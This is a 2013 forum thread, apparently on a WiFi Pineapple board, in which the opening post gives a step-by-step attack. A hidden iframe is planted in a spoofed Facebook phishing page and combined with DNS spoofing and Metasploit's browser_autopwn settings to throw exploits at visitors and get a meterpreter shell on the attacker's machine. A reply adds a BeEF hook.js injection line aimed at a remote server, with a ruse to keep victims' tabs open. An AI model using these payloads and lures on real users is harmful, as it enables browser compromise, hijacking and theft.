skysploit Posted February 20, 2013 Share Posted February 20, 2013 So, here's a simple change that could pay out big (in a pinch) on a pentest... How does it work? It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell. How to set it up. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip". Open msfconsole and "use auxiliary/server/browser_autopwn" Set the options below (n00b's, let Google be your guide) Turn on "DNS Spoof" from the main page of the Pineapple. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits. Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack. Side note: Pentesting at Starbucks can get you put in jail...Happy (responsible) hacking!~skysploit iframe (add this to the end of the script) "iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/" Note: replace the " " at the beginning and end with < > Settings for browser_autopwn msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.42.42 yes The IP address to use for reverse-connect payloads SRVHOST 172.16.42.42 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate SSLVersion SSL3 no Specify the version of SSL that should be used URIPATH /hacked no The URI to use for this exploit (default is random) msf auxiliary(browser_autopwn) > exploit ....... (Server build process was pulled out) ....... [*] --- Done, found 53 exploit modules Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 20, 2013 Share Posted February 20, 2013 About time someone else though of this ;) You could theoretically do the same with ettercap. But instead of autopwn. How about Rel1k's SET java payload? :D Quote Link to comment Share on other sites More sharing options...
skysploit Posted February 20, 2013 Author Share Posted February 20, 2013 That's a great idea! I will have to go back and play around with the java payload. :) Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 20, 2013 Share Posted February 20, 2013 That's a great idea! I will have to go back and play around with the java payload. :) Keep posting man, this is great! -Foxtrot Quote Link to comment Share on other sites More sharing options...
Zephyr Posted February 20, 2013 Share Posted February 20, 2013 Side note: Pentesting at Starbucks can get you put in jail... Not if you're using you Macbook Pro and wearing your rectangular, thick-framed spectacles while donning a latest cause t-shirt ;) Quote Link to comment Share on other sites More sharing options...
inTheDMZ Posted February 20, 2013 Share Posted February 20, 2013 (edited) This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking. Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background. inject this: <script language='Javascript' src="192.168.1.100/hook.js"></script> where 192.168.1.100 is the IP address (local or remote) of the beEF server Edited February 20, 2013 by inTheDMZ Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 20, 2013 Share Posted February 20, 2013 (edited) This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking. Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background. Could work, some sites ask you to keep another window/tab open while a download finishes, etc... Maybe a module should be created -Foxtrot EDIT: Has anyone got part or all of the BeEF to run on the Pineapple? Never looked into it.. Edited February 20, 2013 by Foxtrot Quote Link to comment Share on other sites More sharing options...
inTheDMZ Posted February 20, 2013 Share Posted February 20, 2013 I've run BeEF on a minimal VPS before, and it was a bit slow, I guess it could work on the Pineapple but it would take up resources, see what you can do! Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 20, 2013 Share Posted February 20, 2013 I've run BeEF on a minimal VPS before, and it was a bit slow, I guess it could work on the Pineapple but it would take up resources, see what you can do! Aye!; I'll prepare a USB :) -Foxtrot Quote Link to comment Share on other sites More sharing options...
crepsidro Posted February 20, 2013 Share Posted February 20, 2013 Wait... Pineapple's firmware includes metasploit framework? Get outta town! Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 20, 2013 Share Posted February 20, 2013 Wait... Pineapple's firmware includes metasploit framework? Get outta town! uh.. does it? -Foxtrot Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 20, 2013 Share Posted February 20, 2013 uh.. does it? -Foxtrot Pretty sure no. To many dependencies and it is a resource hog. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 20, 2013 Share Posted February 20, 2013 Pretty sure no. To many dependencies and it is a resource hog. Ah, thought so lol -Foxtrot Quote Link to comment Share on other sites More sharing options...
skysploit Posted February 20, 2013 Author Share Posted February 20, 2013 Wait... Pineapple's firmware includes metasploit framework? Get outta town! crepsidro, I have not personally tried to run msf on the pineapple. I dont think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There's multiple ways to this, below is the way I typically setup my connections. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network. Using Backtrack runnning in a VM, connect both the wireless card and the ethernet port to the VM (yes, i pull both resources from the hosting machine to the VM). Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the networks gateway address. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above) Hope this helps. ~skysploit Quote Link to comment Share on other sites More sharing options...
crepsidro Posted February 21, 2013 Share Posted February 21, 2013 Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation. If i have my laptop i dont need a pineapple - wifi adapter works as fine. Quote Link to comment Share on other sites More sharing options...
skysploit Posted February 22, 2013 Author Share Posted February 22, 2013 Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation. If i have my laptop i dont need a pineapple - wifi adapter works as fine. Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 22, 2013 Share Posted February 22, 2013 Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple. The first half of this was an idea I had a year or so ago :P It's a good one too. Quote Link to comment Share on other sites More sharing options...
barry99705 Posted February 26, 2013 Share Posted February 26, 2013 (edited) Pretty sure no. To many dependencies and it is a resource hog. Heh, should try running metasploit on a pda! I've done it, once. It was painful, but it worked. Not my device, but that's what I had. ​ <<----- Why is this getting added after every image? Edited February 26, 2013 by barry99705 Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 26, 2013 Share Posted February 26, 2013 That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image? Quote Link to comment Share on other sites More sharing options...
barry99705 Posted February 27, 2013 Share Posted February 27, 2013 That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image? The image icon above the post box. It also added one when I added an emoticon. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.